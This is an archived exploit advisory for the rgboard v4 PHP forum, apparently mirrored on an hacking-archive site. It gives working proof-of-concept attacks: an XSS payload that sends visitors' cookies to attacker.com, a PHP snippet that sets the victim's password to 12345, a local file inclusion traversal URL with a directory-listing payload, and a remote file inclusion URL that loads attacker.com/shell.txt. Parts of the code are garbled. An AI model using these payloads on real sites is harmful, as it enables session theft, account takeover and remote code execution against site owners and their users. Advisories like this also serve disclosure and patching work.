AOH :: HP Unsorted R :: VA2516.HTM

rgboard v4 (07.07.27) Multiple Vulnerability



rgboard v4 (07.07.27) Multiple Vulnerability
rgboard v4 (07.07.27) Multiple Vulnerability



/***************************
XSS Vulnerability

/wrtie.php

..

$bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html use'.

*************************/

poc:

Inject XSS tag : 
"http://attacker.com" Hi">onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location">Hi there! :) 

/rghunter.php - Makes password as 12345

eregi_replace("http://","",$l); 

  $chk = 0;

  for($i = 0; $i < strlen($url); $i++)
  {
	if($url[$i] == '/')
        {
		$chk = $i;
	}
  }
  for($i = $chk; $i < strlen($url); $i++)
  {
  	$url[$i] = "";
  }

  $url = $url."/../rg4_member/modify.php";
  setcookie($c);
?>

"http:// ?>?" method = "post" name = "member_info"> value="attacker@attack.com">
/*************************** Local File Inclusion Vulnerability /_footer.php if(file_exists($skin_path."footer.php")) include($skin_path."footer.php"); //File inclusion *************************/ poc: //yeah, there is a problem.. file_exists()! //How can we bypass it? I don`t know :) //If we have account in same server with target, we can attack his board easily //Here is the example : http://attacker.com/RGboard/rg4_board/_footer.php?skin_path=../../../../../../tmp/ /tmp/footer.php handle . "\n"; echo "Path: " . $d->path . "\n"; while (false !== ($entry = $d->read())) { echo $entry."\n"; } $d->close(); ?> //Yeah, It is good, But when we don`t account in that server, How we can beat target? //We can find a clue from php.net //On windows, use //computername/share/filename or \\computername\share\filename to check files on network shares. //As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer to List of Supported Protocols/Wrappers //for a listing of which wrappers support stat() family of functionality. //Do you find clue too? :-O /*************************** Remote File Inclusion Vulnerability /footer.php .. include($_path['counter']."rg_counter.php"); ?> //File inclusion *************************/ poc: http://test.com/RGboard/include/footer.php?_path[counter]=http://attacker.com/shell.txt?

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.